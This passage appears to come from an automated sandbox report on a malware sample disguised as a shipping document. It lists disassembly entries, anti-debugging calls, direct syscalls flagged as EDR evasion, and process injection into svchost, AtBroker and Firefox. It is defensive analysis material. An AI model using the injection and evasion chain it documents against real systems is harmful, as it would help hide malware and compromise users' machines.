Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AEB1D mov eax, dword ptr fs:[00000030h]	1_2_031AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204B00 mov eax, dword ptr fs:[00000030h]	1_2_03204B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315EB20 mov eax, dword ptr fs:[00000030h]	1_2_0315EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315EB20 mov eax, dword ptr fs:[00000030h]	1_2_0315EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F8B28 mov eax, dword ptr fs:[00000030h]	1_2_031F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031F8B28 mov eax, dword ptr fs:[00000030h]	1_2_031F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128B50 mov eax, dword ptr fs:[00000030h]	1_2_03128B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DEB50 mov eax, dword ptr fs:[00000030h]	1_2_031DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E4B4B mov eax, dword ptr fs:[00000030h]	1_2_031E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E4B4B mov eax, dword ptr fs:[00000030h]	1_2_031E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C6B40 mov eax, dword ptr fs:[00000030h]	1_2_031C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C6B40 mov eax, dword ptr fs:[00000030h]	1_2_031C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FAB40 mov eax, dword ptr fs:[00000030h]	1_2_031FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D8B42 mov eax, dword ptr fs:[00000030h]	1_2_031D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0312CB7E mov eax, dword ptr fs:[00000030h]	1_2_0312CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]	1_2_03202B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]	1_2_03202B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]	1_2_03202B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03202B57 mov eax, dword ptr fs:[00000030h]	1_2_03202B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140BBE mov eax, dword ptr fs:[00000030h]	1_2_03140BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140BBE mov eax, dword ptr fs:[00000030h]	1_2_03140BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_031E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031E4BB0 mov eax, dword ptr fs:[00000030h]	1_2_031E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DEBD0 mov eax, dword ptr fs:[00000030h]	1_2_031DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]	1_2_03150BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]	1_2_03150BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03150BCB mov eax, dword ptr fs:[00000030h]	1_2_03150BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]	1_2_03130BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]	1_2_03130BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130BCD mov eax, dword ptr fs:[00000030h]	1_2_03130BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]	1_2_03138BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]	1_2_03138BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138BF0 mov eax, dword ptr fs:[00000030h]	1_2_03138BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315EBFC mov eax, dword ptr fs:[00000030h]	1_2_0315EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BCBF0 mov eax, dword ptr fs:[00000030h]	1_2_031BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BCA11 mov eax, dword ptr fs:[00000030h]	1_2_031BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03154A35 mov eax, dword ptr fs:[00000030h]	1_2_03154A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03154A35 mov eax, dword ptr fs:[00000030h]	1_2_03154A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316CA24 mov eax, dword ptr fs:[00000030h]	1_2_0316CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0315EA2E mov eax, dword ptr fs:[00000030h]	1_2_0315EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03136A50 mov eax, dword ptr fs:[00000030h]	1_2_03136A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140A5B mov eax, dword ptr fs:[00000030h]	1_2_03140A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03140A5B mov eax, dword ptr fs:[00000030h]	1_2_03140A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031ACA72 mov eax, dword ptr fs:[00000030h]	1_2_031ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031ACA72 mov eax, dword ptr fs:[00000030h]	1_2_031ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]	1_2_0316CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]	1_2_0316CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316CA6F mov eax, dword ptr fs:[00000030h]	1_2_0316CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031DEA60 mov eax, dword ptr fs:[00000030h]	1_2_031DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03168A90 mov edx, dword ptr fs:[00000030h]	1_2_03168A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313EA80 mov eax, dword ptr fs:[00000030h]	1_2_0313EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204A80 mov eax, dword ptr fs:[00000030h]	1_2_03204A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138AA0 mov eax, dword ptr fs:[00000030h]	1_2_03138AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03138AA0 mov eax, dword ptr fs:[00000030h]	1_2_03138AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03186AA4 mov eax, dword ptr fs:[00000030h]	1_2_03186AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03130AD0 mov eax, dword ptr fs:[00000030h]	1_2_03130AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03164AD0 mov eax, dword ptr fs:[00000030h]	1_2_03164AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03164AD0 mov eax, dword ptr fs:[00000030h]	1_2_03164AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]	1_2_03186ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]	1_2_03186ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03186ACC mov eax, dword ptr fs:[00000030h]	1_2_03186ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316AAEE mov eax, dword ptr fs:[00000030h]	1_2_0316AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316AAEE mov eax, dword ptr fs:[00000030h]	1_2_0316AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BC912 mov eax, dword ptr fs:[00000030h]	1_2_031BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128918 mov eax, dword ptr fs:[00000030h]	1_2_03128918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03128918 mov eax, dword ptr fs:[00000030h]	1_2_03128918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE908 mov eax, dword ptr fs:[00000030h]	1_2_031AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031AE908 mov eax, dword ptr fs:[00000030h]	1_2_031AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B892A mov eax, dword ptr fs:[00000030h]	1_2_031B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C892B mov eax, dword ptr fs:[00000030h]	1_2_031C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B0946 mov eax, dword ptr fs:[00000030h]	1_2_031B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03204940 mov eax, dword ptr fs:[00000030h]	1_2_03204940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D4978 mov eax, dword ptr fs:[00000030h]	1_2_031D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D4978 mov eax, dword ptr fs:[00000030h]	1_2_031D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BC97C mov eax, dword ptr fs:[00000030h]	1_2_031BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]	1_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]	1_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03156962 mov eax, dword ptr fs:[00000030h]	1_2_03156962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0317096E mov eax, dword ptr fs:[00000030h]	1_2_0317096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0317096E mov edx, dword ptr fs:[00000030h]	1_2_0317096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0317096E mov eax, dword ptr fs:[00000030h]	1_2_0317096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B89B3 mov esi, dword ptr fs:[00000030h]	1_2_031B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B89B3 mov eax, dword ptr fs:[00000030h]	1_2_031B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031B89B3 mov eax, dword ptr fs:[00000030h]	1_2_031B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031429A0 mov eax, dword ptr fs:[00000030h]	1_2_031429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031309AD mov eax, dword ptr fs:[00000030h]	1_2_031309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031309AD mov eax, dword ptr fs:[00000030h]	1_2_031309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0313A9D0 mov eax, dword ptr fs:[00000030h]	1_2_0313A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031649D0 mov eax, dword ptr fs:[00000030h]	1_2_031649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031FA9D3 mov eax, dword ptr fs:[00000030h]	1_2_031FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031C69C0 mov eax, dword ptr fs:[00000030h]	1_2_031C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031629F9 mov eax, dword ptr fs:[00000030h]	1_2_031629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031629F9 mov eax, dword ptr fs:[00000030h]	1_2_031629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BE9E0 mov eax, dword ptr fs:[00000030h]	1_2_031BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031BC810 mov eax, dword ptr fs:[00000030h]	1_2_031BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov ecx, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03152835 mov eax, dword ptr fs:[00000030h]	1_2_03152835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0316A830 mov eax, dword ptr fs:[00000030h]	1_2_0316A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D483A mov eax, dword ptr fs:[00000030h]	1_2_031D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_031D483A mov eax, dword ptr fs:[00000030h]	1_2_031D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03160854 mov eax, dword ptr fs:[00000030h]	1_2_03160854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03134859 mov eax, dword ptr fs:[00000030h]	1_2_03134859

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Code function: 0_2_00FA0AA6 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00FA0AA6

Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F725B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F725B2
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F607BF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00F607BF
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F60955 SetUnhandledExceptionFilter,	0_2_00F60955
Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Code function: 0_2_00F60BA1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00F60BA1

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtWriteVirtualMemory: Direct from: 0x76F0490C	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtAllocateVirtualMemory: Direct from: 0x76F03C9C	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtClose: Direct from: 0x76EF7B2E
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtUnmapViewOfSection: Direct from: 0x76F02D3C	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\shipping doc_20241111.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\AtBroker.exe

Thread register set: target process: 5432

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\AtBroker.exe

Thread APC queued: target process: C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2763008

Jump to behavior

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

0_2_00FA1145

Source: C:\Users\user\Desktop\shipping doc_20241111.exe

